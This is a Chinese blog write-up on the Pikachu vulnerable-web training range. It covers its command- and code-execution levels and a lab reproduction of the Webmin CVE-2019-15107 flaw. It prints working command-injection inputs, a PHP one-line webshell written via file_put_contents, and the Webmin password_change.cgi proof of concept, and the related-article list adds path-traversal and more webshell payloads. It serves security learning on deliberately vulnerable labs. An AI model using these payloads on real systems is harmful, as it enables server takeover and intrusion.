pikachu RCE--远程命令执行 & 远程代码执行

最新推荐文章于 2024-05-16 10:15:47 发布
最新推荐文章于 2024-05-16 10:15:47 发布
阅读量420 收藏
点赞数
分类专栏: 漏洞 靶场 文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44769042/article/details/120245437
版权

目录

exec "ping"

exec "eval"

webmin 远程命令执行 (CVE-2019-15107)

exec "ping"

介绍:

应用程序有时需要调用一些执行命令的函数,如在PHP里,使用system,exec,shell_exec,passthru,popen,proc_popen等函数可以执行系统命令。当黑客可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

观察ttl,可大致判断目标为 windows系统

利用管道符 | ,让系统执行命令

127.0.0.1 | dir

127.0.0.1 | ipconfig

127.0.0.1 | net user

exec "eval"

概念

代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。类似我们常见的SQL注入,是将SQL语句带入数据库查询,而我们的代码注入,则是将代码注入到脚本中让应用对代码进行解析,其危害直接相当于一个WEB后门的存在!远程代码执行实际上就是调用服务器网站代码进行执行。

产生原因:由于服务端存在执行的函数,在使用的过程中没有做好一个严格的控制,造成了实际的参数在客户端中可控

eval()

这个函数的作用就是把一段字符串当作PHP语句来执行(一般情况下不建议使用容易被黑客利用)

system("dir");

file_put_contents('shell.php','<?php @eval($_POST[pass]) ?>');

点击提交按钮,直接会执行代码,写入webshell

可以直接连接上

webmin 远程命令执行 (CVE-2019-15107)

webmin简介

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 Webmin 让您能够在远程使用支持 HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web 界面管理您的主机。

漏洞简介

webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关闭密码过期策略时,受漏洞威胁的概率较小,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行。

漏洞复现

一、vulhub环境搭建

        1.启动docker环境 (webmin 1.910)

        2. 我这里在本机浏览器进入,https://靶机ip:10000

        3. 访问/password_change.cgi

        以POST形式发送POC

user=rootxx&pam=&expired=2&old=test | id&new1=test2&new2=test2

可以看到,执行了 ‘id’ 命令

换成其他命令,也可以执行

user=rootxx&pam=&expired=2&old=test | pwd&new1=test2&new2=test2

木剑温小二丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu-master.zip
06-25
Pikachu,这是一个综合类型的靶场练习环境,覆盖了较为全面的漏洞练习,在掌握漏洞原理后,可以通过该靶场来进一步强化自己的知识技能。
pikachu通关记之RCE 远程系统命令执行 远程代码执行
qq_35258210的博客
01-19 326
"""本人网安小白,此贴仅作为记录我个人测试的思路、总结以便后期复习;今后本着少就是多,慢就是快的方式一步一个脚印进行学习,把这个知识点学扎实了,再学另外一个知识点。费曼教授是不是曾经说过以教代学是最好的学习方式?有很多错点可圈可指,所以也请dalao指出不对的地方,所谓教他人的时候也是在稳固自身""" 未做严格排版,后面有时间了再来整理整理 目录 exec"ping" 远程系统命令执行 exec"evel" 远程代码执行 Ps:靶机链接:https://blog.csdn.net/qq_3525
PikachuRCE实验
莫黎小天
05-26 519
一、exec“ping” 在输入框输入8.8.8.8,发现可以ping通 1.ip+|+命令 1)在输入127.0.0.1 | whoami命令执行如下:得到设备名称以及用户名称 2)输入127.0.0.1 |systeminifo,可以爆出更多的关于主机的信息 2.ip+&+命令(与上面类似) 127.0.0.1 & whoami既可以输出是否ping通也可以显示设备名称及用户名称 二、execevel”实验 查看源代码 需要获得一个不报错的值,才能执行html 拿最简单的p
Pikachu靶场-RCE远程命令/代码执行漏洞~保姆级教程!!!
最新发布
2301_77360738的博客
05-16 268
全网最最最详细的Pikachu靶场远程命令/代码执行漏洞,看完包会,小白可入!!!
pikachu-RCE
qq_41048303的博客
03-04 189
pikachu-RCE 1.exec “ping” 正常情况下输入Ip地址,可以看到下面有ping命令的结果 ​ 输入192.168.1.1;ifconfig,可以看到ifconfig命令的结果也显示了出来,以此类推可以伪造更多的命令。 2.execevel” ​ 在输入框里输入phpinfo();可以看到phpinfo()函数的结果显示了出来。 ...
pikaqiu 文件上传 和文件包含漏洞
weixin_45498459的博客
04-24 279
文件包含漏洞的 考虑常用的几种包含方式为 同目录包含 file=.htaccess 目录遍历 ?file=../../../../../../../../../var/lib/locate.db 日志注入 ?file=../../../../../../../../../var/log/apache/error.log 利用 /proc/self/environ其日志可以使用SSH日志或者Web日志等多种日志来源测试 一句话木马 <php @eval($_POST[pp]);?&g...
pikachu--命令执行
firecjh的博客
06-10 244
进入pikachu平台。(当第一条命令失败时,它仍然会执行第二条命令,表示。(前面的命令执行成功后,它后面的命令才被执行)(前面的命令执行失败,它后面的命令才被执行)分析为什么会造成命令执行漏洞。函数执行,造成命令可拼接执行执行失败,还是会继续执行命令执行失败的情况下不会执行命令执行成功,就不会执行命令执行不成功,就会执行命令成功与否,都会去执行。:代表首先执行前者命令命令语句没有制约关系)命令语句的输入执行。,但是前提条件是命令执行正确才会执行命令命令语句的输出,作为。
pikachu-master
05-04
pikachu漏洞测试平台搭建
Pikachu Wallpaper - New Tab Theme-crx插件
04-06
皮卡丘 - 新标签主题安装并获得与Pikachu壁纸扩展的更好的镀Chrome,由粉丝制作,为粉丝们享受动漫,每次打开新标签时都会享受Pikachu的各种各样的HD壁纸..您好动漫粉丝欢迎来到我们的页面,皮卡丘新标签和壁纸插件...
皮卡丘你好「Hello Pikachu」-crx插件
03-11
观看皮卡丘横跨您的网页! 每个人都喜欢的Pokemon通过不时在您的Chrome浏览器上运行来打个招呼。 他不会一直出来,所以要耐心! 您可以调整皮卡丘出现的频率,并将其速度设置为快或慢。 请注意,安装扩展后,皮卡丘...
draw-pikachu-on-the-web
03-20
draw-pikachu-on-the-web
pikachu--代码执行
firecjh的博客
06-10 196
即把用户的输入作为代码的一部分进行执行,造成了远程代码执行漏洞。进入pikachu平台。点击exec“eval”。分析为什么会造成代码执行漏洞。a) 执行phpinfo();直接把输入的内容放在。
Pikachu-----RCE远程命令/代码执行
m0_65712192的博客
12-29 932
Pikachu-----RCE
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 330
RCE远程代码命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
Pikachu3_RCE(远程命令/代码执行)
weixin_44193247的博客
03-15 1536
Pikachu漏洞复现练习篇
如何生成ply文件_国际象棋程序Stockfish NNUE设计简介(四)训练数据生成
weixin_35322457的博客
12-31 1445
前三篇主要介绍了在给定一个训练好的权重的前提下,Stockfish NNUE是如何使用它的。接下来的两篇我们会着重介绍一下如何训练一个NNUE网络的权重。 训练一个NNUE网络权重一般要经过两步:一,生成训练数据;二使用训练数据训练网络。如果你曾经编译过Stockfish NNUE,或者尝试训练NNUE权重的话,你就会知道,Stockfish NNUE从训练到实际应用,包含了三个可执行文件,分别对...
Pikachu漏洞靶场 RCE(远程命令执行/代码执行)
柠檬i的博客
04-05 1438
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口
pikachu rce靶场
07-25
很抱歉,我无法回答关于"Pikachu RCE靶场"的问题。因为在提供的引用内容,并没有提到与"Pikachu RCE靶场"相关的信息。如果您有其他问题,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [Pikachu靶场-RCE](https://blog.csdn.net/weixin_48899364/article/details/128485444)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Pikachu靶场之RCE漏洞详解](https://blog.csdn.net/m0_46467017/article/details/124838779)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值